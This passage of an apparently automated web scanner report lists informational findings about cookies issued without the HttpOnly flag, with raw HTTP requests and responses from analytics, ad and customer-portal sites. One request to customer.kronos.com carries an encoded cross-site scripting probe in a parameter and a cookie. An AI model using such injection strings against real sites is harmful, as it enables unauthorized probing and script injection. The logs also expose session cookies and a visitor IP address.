GET /counter?id=1446197;t=69;js=13;r=;j=true;s=1920*1200;d=16;rand=0.7879115420024838 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: core1.node15.top.mail.ru

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 15:28:24 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: FTID=2jmTRp3gv_ms:1303745304:1446197:::; path=/; expires=Tue, 26 Jul 2011 15:28:24 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 885
Connection: close

GIF87a&...................................................................................................dddLLL......ppp...~~~.........ZZZyyymmm..............................???888...iii......PPP....
...[SNIP]...
17.91. http://core1.node15.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core1.node15.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1446197;t=69;js=13;r=;j=true;s=1920*1200;d=16;rand=0.06563902948983014 HTTP/1.1
Host: core1.node15.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; searchuid=1981869761303741204; VID=2Tinlz3w7bGs; p=NOIGAEqT7AAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:47:44 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:47:44 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 885
Connection: close

GIF87a&...................................................................................................dddLLL......ppp...~~~.........ZZZyyymmm..............................???888...iii......PPP....
...[SNIP]...
17.92. http://core2.node12.top.mail.ru/counter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://core2.node12.top.mail.ru
Path:   /counter

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /counter?id=1301840;t=234;js=13;r=;j=true;s=1920*1200;d=16;rand=0.6505313029047102 HTTP/1.1
Host: core2.node12.top.mail.ru
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoFACDL8gAAdDQMfV4MAQAIEwAIeWwM; VID=2Tinlz3w7bGs; searchuid=1981869761303741204; p=pPUGAEqlaAAA

Response

HTTP/1.1 200 OK
Server: wz/1.4
Date: Mon, 25 Apr 2011 14:39:51 GMT
Content-Type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR PSA OUR NOR"
Set-Cookie: VID=2Tinlz3w7bGs; path=/; expires=Tue, 26 Jul 2011 14:39:51 GMT; domain=.mail.ru
Cache-control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1027
Connection: close

GIF87aX....../e&...*Y!......JsCmmm..........MSN.E.,.......,=....-`$...Aj$...Te..d. D................v.tDUB.~.,....X.......".di.(.....Z*..b.x....q..k#...<...l:....9Hx..A.q.L.`.B..L...dQ..lmf.....]-..3
...[SNIP]...
17.93. http://count.rbc.ru/p712.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://count.rbc.ru
Path:   /p712.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p712.gif?r=&width=1920&height=1200&hash=&rn=0.2250832160934806 HTTP/1.1
Host: count.rbc.ru
Proxy-Connection: keep-alive
Referer: http://pretty.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Mon, 25 Apr 2011 14:26:50 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
Expires: Mon, 25 Apr 2011 14:26:49 GMT
Cache-Control: no-cache
Set-Cookie: UID=wrokyk21hKoDJPTuDHE4Ag==; expires=Tue, 24-Apr-12 14:26:50 GMT; path=/
P3P: policyref="/w3c/p3p.xml", CP="NON CURa ADMa DEVa OUR IND UNI COM NAV LOC"

GIF89a.............!.......,...........L..;
17.94. http://counter.hitslink.com/statistics.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counter.hitslink.com
Path:   /statistics.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /statistics.asp?v=1&s=93&acct=customermag&an=Netscape&sr=&ck=252&rf=&sl=undefined&av=5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.1%3B%20en-US%29%20AppleWebKit/534.16%20%28KHTML%2C%20like%20Gecko%29%20Chrome/10.0.648.205%20Safari/534.16&l=en-US&pf=Win32&pg=/&cd=16&rs=1920%20x%201200&tz=300&je=true&tks=1303747423560 HTTP/1.1
Host: counter.hitslink.com
Proxy-Connection: keep-alive
Referer: http://www.customermagnetism.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 16:03:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
Set-Cookie: VISID=3B80ADBAB4; expires=Mon, 18-Jan-2038 05:00:00 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate, no-transform
Pragma: no-cache
Expires: -1
Content-Type: image/gif
Content-Length: 48

GIF89a...................!.......,...........L.;
17.95. http://counter.rambler.ru/top100.cnt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counter.rambler.ru
Path:   /top100.cnt

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /top100.cnt?1433420 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: counter.rambler.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 15:28:13 GMT
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-type: image/gif
P3P: policyref="/w3c/p3p.xml", CP="NON ADM DEV TAI PSA PSD IVA OUR IND UNI COM NAV INT"
Set-Cookie: ruid=TMALBg2TtU2U+QAAAUABRQ==; path=/; domain=.rambler.ru; expires=Thu, 22-Apr-21 15:28:13 GMT

GIF89a...................!.......,...........T..;
17.96. http://counter.yadro.ru/hit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://counter.yadro.ru
Path:   /hit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hit?t44.1;r;s1920*1200*16;uabout%3Ablank;0.001672729670570472 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: counter.yadro.ru

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 25 Apr 2011 15:27:54 GMT
Server: 0W/0.8c
Content-Type: text/html
Location: http://counter.yadro.ru/hit?q;t44.1;r;s1920*1200*16;uabout%3Ablank;0.001672729670570472
Content-Length: 32
Expires: Sat, 24 Apr 2010 20:00:00 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: FTID=1DjPBw3bKUms; path=/; expires=Mon, 23 Apr 2012 20:00:00 GMT; domain=.yadro.ru

<html><body>Moved</body></html>
17.97. https://customer.kronos.com/Default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /Default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Default.asp?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000003%2529%253C%252Fscript%253E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: customer.kronos.com
Cookie: ICRedirect=Url=nsextt%3D%27%2522%2D%2D%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Enetsparker%280x000002%29%253C%2Fscript%253E; KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=FKMMPBCAJIEPPLMFHLPCHMNK
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:39:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 17287
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: ICRedirect=Url=nsextt%3D%252527%252522%2D%2D%25253E%25253C%25252Fstyle%25253E%25253C%25252Fscript%25253E%25253Cscript%25253Enetsparker%2525280x000003%252529%25253C%25252Fscript%25253E; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
17.98. https://customer.kronos.com/user/forgotpassword.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotpassword.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotpassword.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13005
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
17.99. https://customer.kronos.com/user/forgotusername.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/forgotusername.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/forgotusername.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 13247
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
17.100. https://customer.kronos.com/user/logindenied.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://customer.kronos.com
Path:   /user/logindenied.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /user/logindenied.asp HTTP/1.1
Host: customer.kronos.com
Connection: keep-alive
Referer: https://customer.kronos.com/Default.asp
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306330437105%26vn%3D1; __utmz=137648623.1303738437.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); KronosCust=LogIn=false; ASPSESSIONIDQASQRRDR=CIMMPBCACECLKFBLHGMAAPIL; ICRedirect=Url=; mbox=session#1303738433760-48782#1303741379|check#true#1303739579; s_cc=true; s_nr=1303739518621; s_invisit=true; s_lv=1303739518623; s_lv_s=First%20Visit; s_gpv_page=kronos; s_sq=%5B%5BB%5D%5D; __utma=137648623.1117815011.1303738437.1303738437.1303738437.1; __utmc=137648623; __utmb=137648623.8.10.1303738437; Visitor=173%2E193%2E214%2E243

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:51:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 16169
Content-Type: text/html
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Set-Cookie: Visitor=173%2E193%2E214%2E243; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<SCRIPT language="JavaScript">
<!--

function verify(url) {
if (confirm("Are you sure?")) {
window.location = url;
}

...[SNIP]...
17.101. http://d1.openx.org/ajs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /ajs.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajs.php?zoneid=181824&target=_blank&cb=99696232470&charset=UTF-8&loc=http%3A//www.ripoffreport.com/ HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:07:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 24-Apr-2012 16:07:21 GMT; path=/
Content-Length: 913
Connection: close
Content-Type: text/javascript; charset=UTF-8

var OX_0a78afee = '';
OX_0a78afee += "<"+"a href=\'http://d1.openx.org/ck.php?oaparams=2__bannerid=564349__zoneid=181824__OXLCA=1__cb=e4220b1aa1__r_id=4b1ed3327d6ec68648b5d140f8dbf48e__r_ts=lk7u49__oa
...[SNIP]...
17.102. http://d1.openx.org/lg.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lg.php?bannerid=564349&campaignid=264961&zoneid=181824&loc=http%3A%2F%2Fwww.ripoffreport.com%2F&cb=7ad42b2ca3&r_id=689e0fe32810c999aa5a9136b140a808&r_ts=lk7u48 HTTP/1.1
Host: d1.openx.org
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=bba0cb56df6b6edbf6102c35304755de

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 16:07:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=bba0cb56df6b6edbf6102c35304755de; expires=Tue, 24-Apr-2012 16:07:22 GMT; path=/
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;
17.103. http://d7.zedo.com/img/bh.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /img/bh.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /img/bh.gif?n=826&g=20&a=798&s=$t&l=1&t=i&e=1 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 88
Content-Type: image/gif
Set-Cookie: ZFFAbh=845B826,20|798_845#365;expires=Tue, 24 Apr 2012 15:14:03 GMT;domain=.zedo.com;path=/;
ETag: "1b633f4-7054-4942082502f40"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
X-Varnish: 1492157159
Cache-Control: max-age=29594
Expires: Mon, 25 Apr 2011 23:27:18 GMT
Date: Mon, 25 Apr 2011 15:14:04 GMT
Connection: close

GIF89a.............!.......,...........D..;

GIF89a.............!.......,...........D..;
17.104. http://demo.kayako.com/supportsuite/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demo.kayako.com
Path:   /supportsuite/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /supportsuite/index.php?_ca=css&group=default HTTP/1.1
Host: demo.kayako.com
Proxy-Connection: keep-alive
Referer: http://demo.kayako.com/supportsuite/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: km__last_visit=988416873; km__last_activity=1303776873; km__tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D; __utmz=243534751.1303758892.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=243534751.649237146.1303758892.1303758892.1303758892.1; __utmc=243534751; __utmb=243534751.1.10.1303758892; SWIFT_sessionid40=cdydhwsfse8y4xjyex80hyc0xlrhdz3j

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:42:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Set-Cookie: SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Tue, 24-Apr-2012 19:42:21 GMT; path=/
Expires: Tue, 26 Apr 2011 19:42:21 GMT
Cache-Control: max-age=3600, must-revalidate
Connection: close
Content-Type: text/css
Content-Length: 14798


A:active {
   COLOR: #000000; TEXT-DECORATION: none; FONT-FAMILY: Verdana, Tahoma; FONT-SIZE: 11px;
}
A:visited {
   COLOR: #000000; TEXT-DECORATION: none; FONT-FAMILY: Verdana, Tahoma; FONT-SIZE: 11px;

...[SNIP]...
17.105. http://demr.opt.fimserve.com/adopt/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://demr.opt.fimserve.com
Path:   /adopt/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adopt/?r=h&l=999e4367-df70-42c4-a090-65a968de6505&sz=300x250&neg=&ega=&puid=&rnd=2466948 HTTP/1.1
Host: demr.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; SUBHS=|||00FY6l1fm00000pjK4H|1.1303561987332; LO=00GO66Bfm00000f500n1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SUBHS=|||00FY6l1fm00000pjK4H|1.1303747664203; Domain=demr.opt.fimserve.com; Expires=Mon, 02-May-2011 16:07:44 GMT; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 8059
Date: Mon, 25 Apr 2011 16:07:43 GMT

<script language='Javascript'>var C1Ko1Cq3Xi4B={v1Es1Pr3Ko4C:{"result": {"adv":21,"a":669020,"c":863260,"cpm":2405,"js":false,"ad":"http://demr.opt.fimserve.com/bid/td/?ek=AJPgWSjBfMWiKA5SmknfRy-n_ghs
...[SNIP]...
17.106. http://desk.opt.fimserve.com/adopt/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://desk.opt.fimserve.com
Path:   /adopt/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adopt/?r=h&l=999e4367-df70-42c4-a090-65a968de6505&sz=160x600&neg=&ega=&puid=&rnd=6148479 HTTP/1.1
Host: desk.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.ripoffreport.com/ConsumerResources.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; DMEXP=4; UI="2a8dbca1b98673a117|79973..9.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; ssrtb=0; LO=00GM67mfm00008f500v7

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 25 Apr 2011 16:12:55 GMT
Content-Type: text/html;charset=ISO-8859-1
Connection: keep-alive
P3P: policyref="http://www.fimserve.com/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: SUBHS=||||1.1303747975494; Domain=desk.opt.fimserve.com; Expires=Mon, 02-May-2011 16:12:55 GMT; Path=/
Content-Length: 8006

